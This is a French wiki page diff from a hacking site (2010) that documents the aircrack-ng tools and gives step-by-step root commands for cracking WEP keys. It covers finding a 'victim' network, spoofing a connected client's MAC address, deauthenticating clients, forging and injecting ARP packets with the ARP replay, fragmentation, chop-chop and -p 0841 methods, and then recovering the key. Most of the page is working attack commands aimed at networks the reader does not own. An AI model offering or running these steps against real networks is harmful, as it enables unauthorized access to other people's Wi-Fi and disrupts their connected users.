Pork Center

Aircrack-ng

De Hack-it.org.

(buddy-ng)
 
Ligne 2 : Ligne 2 :
=== aircrack-ng ===
=== aircrack-ng ===
-
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.
+
Sert à casser une clé WEP ou WPA, depuis la derniere version, il utilise l'algorythme PTW par défaut pour le cassage du WEP.
=== airbase-ng ===
=== airbase-ng ===
-
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap".
+
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap". Peut aussi être utilisé en mode ad hoc, simule un poste client ad hoc.
=== airdecap-ng ===
=== airdecap-ng ===
Ligne 30 : Ligne 30 :
=== airolib-ng ===
=== airolib-ng ===
Permet de créer une base de données sqlite en vue d'un crack WPA.
Permet de créer une base de données sqlite en vue d'un crack WPA.
-
<br />ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.
+
<br />'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''
=== airtun-ng ===
=== airtun-ng ===
 +
 +
Permet de dé/chiffrer en WEP des donnés, il peut servir à se connecter en mode monitor, faire une capture en live qui ne prend pas les beacon frame (utile pour une analyse wireshark / tcpdump)
=== buddy-ng ===
=== buddy-ng ===
-
A utiliser avec easside-ng
+
A utiliser avec easside-ng, c'est le serveur auquel se connecte easside-ng
=== easside-ng ===
=== easside-ng ===
Ligne 51 : Ligne 53 :
=== tkiptun-ng ===
=== tkiptun-ng ===
Permet d'aider au crack de clés WPA utilisant TKIP.
Permet d'aider au crack de clés WPA utilisant TKIP.
-
<br />ATTENTION: Cet outil n'est pas encore fonctionnel.
+
<br />'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''
=== wesside-ng ===
=== wesside-ng ===
Outil permettant l'automatisation du crack de clé WEP.
Outil permettant l'automatisation du crack de clé WEP.
 +
 +
 +
<center><big><u>'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''</u></big></center>
 +
 +
== Les drivers WiFi ==
 +
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.
 +
* Pour connaitre les drivers supportés:
 +
>>> airdriver-ng supported
 +
 +
* Pour connaitre les drivers déjà installés:
 +
>>> aidriver-ng installed
 +
 +
* Pour connaitre les drivers WiFi chargés dans le kernel:
 +
>>> airdriver-ng loaded
 +
 +
* Pour détecter les cartes WiFi:
 +
>>> airdriver-ng detect
 +
 +
* Pour décharger un driver inutile:
 +
>>> airdriver-ng unload $num_driver
 +
 +
* Pour compiler un driver:
 +
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:
 +
<br />>>> airdriver-ng compile $num_driver
 +
 +
* Pour installer un driver fraichement compilé:
 +
>>> airdriver-ng install $num_driver
 +
 +
* Pour charger un driver dans le kernel:
 +
>>> airdriver-ng load $num_driver
 +
 +
* Pour avoir des détails sur un driver:
 +
>>> airdriver-ng details $num_driver
== Les différents types d'attaques ==
== Les différents types d'attaques ==
-
TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT
+
Dans les cas l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.
-
<br />Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.
+
=== Légende ===
=== Légende ===
Ligne 70 : Ligne 104 :
=== Mac spoofing ===
=== Mac spoofing ===
-
Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type:
+
Pour les procédures ci-dessous, dans les cas l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte:
-
<br />macchanger --mac $mac $iface
+
<br />>>> ifconfig $iface down
-
<br />et relancer la carte.
+
<br />>>>macchanger --mac $mac_client $iface
=== Méthode "ARP replay" ===
=== Méthode "ARP replay" ===
 +
'''Méthode avec client et sans filtrage MAC'''
* Mettre carte en monitor:
* Mettre carte en monitor:
>>> ifconfig $iface down
>>> ifconfig $iface down
Ligne 81 : Ligne 116 :
* Trouver une victime:
* Trouver une victime:
>>> airodump-ng $iface
>>> airodump-ng $iface
-
<br />Couper une fois la victime trouvée
+
<br />''Couper une fois la victime trouvée''
-
* Lancer la capture d'IVS:
+
* Lancer la capture d'IVs:
>>> airodump-ng -c $canal -w $fichier_capture $iface
>>> airodump-ng -c $canal -w $fichier_capture $iface
<br />-w = préfixe à utiliser pour le nom du fichier de capture
<br />-w = préfixe à utiliser pour le nom du fichier de capture
-
<br />Laisser tourner...
+
<br />''Laisser tourner...''
* Associer la carte à l'AP:
* Associer la carte à l'AP:
Ligne 92 : Ligne 127 :
<br />-1 = fake association
<br />-1 = fake association
<br />30 = temps d'attente entre 2 tentatives
<br />30 = temps d'attente entre 2 tentatives
-
<br />En cas de succes, "Association successful :-)" doit s'afficher (si affiché sans le smiley, attendre)
+
<br />''En cas de succes, "Association successful :-)" doit s'afficher''
* Lancer l'injection:
* Lancer l'injection:
>>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface
>>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface
<br />-3 = attaque ARP replay
<br />-3 = attaque ARP replay
-
<br />Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente
+
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''
 +
 
 +
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
 +
>>> aircrack-ng $fichier_capture
 +
<br />''CRACKED !!!''
 +
 
 +
=== Methode "chop-chop" et "par fragmentation" ===
 +
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''
 +
* Mettre la carte en monitor:
 +
>>> ifconfig $iface
 +
<br />>>> airmon-ng start $iface
 +
 
 +
* Trouver une victime:
 +
>>> airodum-ng $iface
 +
<br />''Couper une fois la victime trouvée''
 +
 
 +
* Lancer la capture d'IVs:
 +
>>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface
 +
<br />-w = préfice à utiliser pour le nom du fichier de capture
 +
<br />''Laisser tourner...''
 +
 
 +
* Associer la carte à l'AP:
 +
>>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface
 +
<br />-1 = fake association
 +
<br />0 = temps d'attente (en ms) entre 2 tentatives
 +
<br />''En cas de succes, "Association successful :-)" doit s'afficher''
 +
** En cas d'échec:
 +
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface
 +
<br />6000 = temps d'attente (en ms) entre 2 tentatives
 +
<br />-o = nombre de jeux de paquets à envoyer à la fois
 +
<br />-q = intervale entre 2 paquets "keep-alive"
 +
** En cas de filtrage MAC:
 +
>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface
 +
<br />-0 = déauthentification
 +
<br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)
 +
<br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP
 +
<br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''
 +
 
 +
* Attaque:
 +
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.
 +
<br />Dans les 2 cas, un fichier .xor sera créé en cas de succès.
 +
** Par fragmentation:
 +
>>> aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface
 +
<br />-5 = attaque par fragmentation
 +
** Chop-chop:
 +
>>> aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface
 +
<br />-4 = attaque chop-chop
 +
 
 +
* Création d'un paquet ARP:
 +
>>> packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp
 +
<br />-0 = générer un paquet ARP
 +
<br />-k = IP de destination (la plupart des AP répondent au 255.255.255.255)
 +
<br />-l = IP source (la plupart des AP répondent au 255.255.255.255)
 +
<br />-w = nom du fichier dans lequel mettre le paquet ARP
 +
 
 +
* Injection de l'ARP:
 +
>>> aireplay-ng -2 -r $fichier_arp $iface
 +
<br />-2 = selection de paquets interactive (accepter le paquet avec "y")
 +
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''
 +
 
 +
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
 +
>>> aircrack-ng $fichier_capture
 +
<br />''CRACKED''
 +
 
 +
=== Méthode "-p 0841" ===
 +
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''
 +
* Mettre la carte en mode monitor:
 +
>>> ifconfig $iface down
 +
>>> airmon-ng start $iface
 +
 
 +
* Trouver une victime:
 +
>>> airodump-ng $iface
 +
<br />''Couper une fois la victime trouvée''
 +
 
 +
* Lancer la capture d'IVs:
 +
>>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface
 +
<br />-w = préfixe à utiliser pour le nom du fichier de capture
 +
<br />''Laisser tourner...''
 +
 
 +
* Associer la carte à la station:
 +
>>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface
 +
<br />-1 = fake association
 +
<br />0 = temps d'attente (en ms) entre 2 tentatives
 +
<br />''En cas de succès, "Association successful :-)" doit s'afficher
 +
** En cas d'échec:
 +
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface
 +
<br />6000 = temps d'attente (en ms) entre 2 tentatives
 +
<br />-o = nombre de jeux de paquets à envoyer à la fois
 +
<br />-q = intervale entre 2 paquets "keep-alive"
 +
** En cas de filtrage MAC:
 +
>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface
 +
<br />-0 = déauthentification
 +
<br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)
 +
<br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP
 +
<br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''
 +
 
 +
* Lancer l'injection:
 +
>>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface
 +
<br />-2 = sélection de paquets interactive (accepter le paquet avec "y")
 +
<br />-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets
 +
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
>>> aircrack-ng $fichier_capture
>>> aircrack-ng $fichier_capture
 +
<br />''CRACKED''

Version actuelle en date du 14 novembre 2010 à 21:42